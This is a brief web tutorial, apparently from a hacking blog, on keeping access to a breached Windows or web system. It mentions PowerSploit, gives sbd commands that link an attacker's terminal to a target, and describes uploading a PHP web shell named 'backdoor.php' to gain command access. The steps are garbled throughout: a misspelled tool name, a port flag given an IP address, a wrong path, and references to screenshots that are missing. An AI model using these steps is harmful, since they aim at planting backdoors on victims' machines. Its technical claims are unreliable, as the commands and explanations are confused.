Maintaining Access

An attacker that have gained access to the target system can choose to use both the system and the resources inside the system, and further use the system as a launch pad to scan and exploit other systems, or keep on exploiting the current system in stealth mode.

 

Tools and Methods for Maintaining Access

A backdoor is a tool to access into the already breached system. Powershell provides access at the application level, but to gain it, the user needs to install the piece of malware locally. Powershell can be used to sneak out passwords, credentials, and any other sensitive information stored on the system.

 

Powersploit is a tool that is for Windows machines. It has PowerShell installed in victims machine. This tool helps the hacker to connect with the victim’s machine via PowerShell.

1.) Open the folder of powerspoilt. 

 

2.)  Download this tool on the victim’s machine to create a web server, which powersploit tools allow to create.

 

3.) The web of the target directory will look like this.

 

4.) Use a command to listen to connect the terminal to the target by typing “sbd -l -p ServerIP -v”.

 

5.) On the server site change the target port to match with the terminal by typing “sbd ServerIP port” on the terminal and you will get connected to the web.

 

6.) Open webshell folder by typing “cd /user/share/webshells/” and then open the php.

 

7.) To upload the shell to a web server, for example “backdoor.php” open the webpage and URL of the web shell.

 

8.) At the end, write the cmd command. You will have all the info of the target.

Comments are closed.